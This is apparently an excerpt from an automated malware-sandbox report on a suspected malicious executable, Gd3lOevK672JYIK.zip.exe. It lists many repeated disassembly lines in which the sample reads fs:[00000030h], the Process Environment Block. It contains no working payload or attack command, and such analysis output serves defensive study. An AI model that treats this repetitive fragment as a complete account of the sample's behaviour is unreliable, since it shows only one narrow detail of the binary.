                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E5E7 mov eax, dword ptr fs:[00000030h]4_2_0186E5E7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018425E0 mov eax, dword ptr fs:[00000030h]4_2_018425E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C5ED mov eax, dword ptr fs:[00000030h]4_2_0187C5ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C5ED mov eax, dword ptr fs:[00000030h]4_2_0187C5ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D6500 mov eax, dword ptr fs:[00000030h]4_2_018D6500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914500 mov eax, dword ptr fs:[00000030h]4_2_01914500
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850535 mov eax, dword ptr fs:[00000030h]4_2_01850535
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E53E mov eax, dword ptr fs:[00000030h]4_2_0186E53E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848550 mov eax, dword ptr fs:[00000030h]4_2_01848550
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848550 mov eax, dword ptr fs:[00000030h]4_2_01848550
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187656A mov eax, dword ptr fs:[00000030h]4_2_0187656A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187656A mov eax, dword ptr fs:[00000030h]4_2_0187656A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187656A mov eax, dword ptr fs:[00000030h]4_2_0187656A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FA49A mov eax, dword ptr fs:[00000030h]4_2_018FA49A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018464AB mov eax, dword ptr fs:[00000030h]4_2_018464AB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018744B0 mov ecx, dword ptr fs:[00000030h]4_2_018744B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CA4B0 mov eax, dword ptr fs:[00000030h]4_2_018CA4B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018404E5 mov ecx, dword ptr fs:[00000030h]4_2_018404E5
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01878402 mov eax, dword ptr fs:[00000030h]4_2_01878402
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01878402 mov eax, dword ptr fs:[00000030h]4_2_01878402
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01878402 mov eax, dword ptr fs:[00000030h]4_2_01878402
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E420 mov eax, dword ptr fs:[00000030h]4_2_0183E420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E420 mov eax, dword ptr fs:[00000030h]4_2_0183E420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183E420 mov eax, dword ptr fs:[00000030h]4_2_0183E420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183C427 mov eax, dword ptr fs:[00000030h]4_2_0183C427
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h]4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h]4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h]4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h]4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h]4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h]4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C6420 mov eax, dword ptr fs:[00000030h]4_2_018C6420
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A430 mov eax, dword ptr fs:[00000030h]4_2_0187A430
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187E443 mov eax, dword ptr fs:[00000030h]4_2_0187E443
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FA456 mov eax, dword ptr fs:[00000030h]4_2_018FA456
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186245A mov eax, dword ptr fs:[00000030h]4_2_0186245A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183645D mov eax, dword ptr fs:[00000030h]4_2_0183645D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CC460 mov ecx, dword ptr fs:[00000030h]4_2_018CC460
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186A470 mov eax, dword ptr fs:[00000030h]4_2_0186A470
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186A470 mov eax, dword ptr fs:[00000030h]4_2_0186A470
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186A470 mov eax, dword ptr fs:[00000030h]4_2_0186A470
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E678E mov eax, dword ptr fs:[00000030h]4_2_018E678E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018407AF mov eax, dword ptr fs:[00000030h]4_2_018407AF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F47A0 mov eax, dword ptr fs:[00000030h]4_2_018F47A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184C7C0 mov eax, dword ptr fs:[00000030h]4_2_0184C7C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C07C3 mov eax, dword ptr fs:[00000030h]4_2_018C07C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018627ED mov eax, dword ptr fs:[00000030h]4_2_018627ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018627ED mov eax, dword ptr fs:[00000030h]4_2_018627ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018627ED mov eax, dword ptr fs:[00000030h]4_2_018627ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CE7E1 mov eax, dword ptr fs:[00000030h]4_2_018CE7E1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018447FB mov eax, dword ptr fs:[00000030h]4_2_018447FB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018447FB mov eax, dword ptr fs:[00000030h]4_2_018447FB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C700 mov eax, dword ptr fs:[00000030h]4_2_0187C700
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840710 mov eax, dword ptr fs:[00000030h]4_2_01840710
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01870710 mov eax, dword ptr fs:[00000030h]4_2_01870710
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C720 mov eax, dword ptr fs:[00000030h]4_2_0187C720
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C720 mov eax, dword ptr fs:[00000030h]4_2_0187C720
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BC730 mov eax, dword ptr fs:[00000030h]4_2_018BC730
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187273C mov eax, dword ptr fs:[00000030h]4_2_0187273C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187273C mov ecx, dword ptr fs:[00000030h]4_2_0187273C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187273C mov eax, dword ptr fs:[00000030h]4_2_0187273C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187674D mov esi, dword ptr fs:[00000030h]4_2_0187674D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187674D mov eax, dword ptr fs:[00000030h]4_2_0187674D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187674D mov eax, dword ptr fs:[00000030h]4_2_0187674D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CE75D mov eax, dword ptr fs:[00000030h]4_2_018CE75D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840750 mov eax, dword ptr fs:[00000030h]4_2_01840750
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882750 mov eax, dword ptr fs:[00000030h]4_2_01882750
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882750 mov eax, dword ptr fs:[00000030h]4_2_01882750
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C4755 mov eax, dword ptr fs:[00000030h]4_2_018C4755
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01848770 mov eax, dword ptr fs:[00000030h]4_2_01848770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01850770 mov eax, dword ptr fs:[00000030h]4_2_01850770
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844690 mov eax, dword ptr fs:[00000030h]4_2_01844690
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01844690 mov eax, dword ptr fs:[00000030h]4_2_01844690
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187C6A6 mov eax, dword ptr fs:[00000030h]4_2_0187C6A6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018766B0 mov eax, dword ptr fs:[00000030h]4_2_018766B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0187A6C7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A6C7 mov eax, dword ptr fs:[00000030h]4_2_0187A6C7
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h]4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h]4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h]4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE6F2 mov eax, dword ptr fs:[00000030h]4_2_018BE6F2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C06F1 mov eax, dword ptr fs:[00000030h]4_2_018C06F1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C06F1 mov eax, dword ptr fs:[00000030h]4_2_018C06F1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE609 mov eax, dword ptr fs:[00000030h]4_2_018BE609
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185260B mov eax, dword ptr fs:[00000030h]4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185260B mov eax, dword ptr fs:[00000030h]4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185260B mov eax, dword ptr fs:[00000030h]4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185260B mov eax, dword ptr fs:[00000030h]4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185260B mov eax, dword ptr fs:[00000030h]4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185260B mov eax, dword ptr fs:[00000030h]4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185260B mov eax, dword ptr fs:[00000030h]4_2_0185260B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882619 mov eax, dword ptr fs:[00000030h]4_2_01882619
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185E627 mov eax, dword ptr fs:[00000030h]4_2_0185E627
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01876620 mov eax, dword ptr fs:[00000030h]4_2_01876620
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01878620 mov eax, dword ptr fs:[00000030h]4_2_01878620
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184262C mov eax, dword ptr fs:[00000030h]4_2_0184262C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0185C640 mov eax, dword ptr fs:[00000030h]4_2_0185C640
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A660 mov eax, dword ptr fs:[00000030h]4_2_0187A660
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187A660 mov eax, dword ptr fs:[00000030h]4_2_0187A660
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01872674 mov eax, dword ptr fs:[00000030h]4_2_01872674
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190866E mov eax, dword ptr fs:[00000030h]4_2_0190866E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190866E mov eax, dword ptr fs:[00000030h]4_2_0190866E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h]4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018409AD mov eax, dword ptr fs:[00000030h]4_2_018409AD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018409AD mov eax, dword ptr fs:[00000030h]4_2_018409AD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C89B3 mov esi, dword ptr fs:[00000030h]4_2_018C89B3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C89B3 mov eax, dword ptr fs:[00000030h]4_2_018C89B3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C89B3 mov eax, dword ptr fs:[00000030h]4_2_018C89B3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190A9D3 mov eax, dword ptr fs:[00000030h]4_2_0190A9D3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D69C0 mov eax, dword ptr fs:[00000030h]4_2_018D69C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h]4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h]4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h]4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h]4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h]4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h]4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018749D0 mov eax, dword ptr fs:[00000030h]4_2_018749D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CE9E0 mov eax, dword ptr fs:[00000030h]4_2_018CE9E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018729F9 mov eax, dword ptr fs:[00000030h]4_2_018729F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018729F9 mov eax, dword ptr fs:[00000030h]4_2_018729F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE908 mov eax, dword ptr fs:[00000030h]4_2_018BE908
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BE908 mov eax, dword ptr fs:[00000030h]4_2_018BE908
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838918 mov eax, dword ptr fs:[00000030h]4_2_01838918
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01838918 mov eax, dword ptr fs:[00000030h]4_2_01838918
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CC912 mov eax, dword ptr fs:[00000030h]4_2_018CC912
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C892A mov eax, dword ptr fs:[00000030h]4_2_018C892A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018D892B mov eax, dword ptr fs:[00000030h]4_2_018D892B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C0946 mov eax, dword ptr fs:[00000030h]4_2_018C0946
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01914940 mov eax, dword ptr fs:[00000030h]4_2_01914940
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01866962 mov eax, dword ptr fs:[00000030h]4_2_01866962
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01866962 mov eax, dword ptr fs:[00000030h]4_2_01866962
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01866962 mov eax, dword ptr fs:[00000030h]4_2_01866962
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0188096E mov eax, dword ptr fs:[00000030h]4_2_0188096E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0188096E mov edx, dword ptr fs:[00000030h]4_2_0188096E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0188096E mov eax, dword ptr fs:[00000030h]4_2_0188096E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CC97C mov eax, dword ptr fs:[00000030h]4_2_018CC97C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E4978 mov eax, dword ptr fs:[00000030h]4_2_018E4978
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E4978 mov eax, dword ptr fs:[00000030h]4_2_018E4978
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01840887 mov eax, dword ptr fs:[00000030h]4_2_01840887
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018CC89D mov eax, dword ptr fs:[00000030h]4_2_018CC89D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186E8C0 mov eax, dword ptr fs:[00000030h]4_2_0186E8C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019108C0 mov eax, dword ptr fs:[00000030h]4_2_019108C0
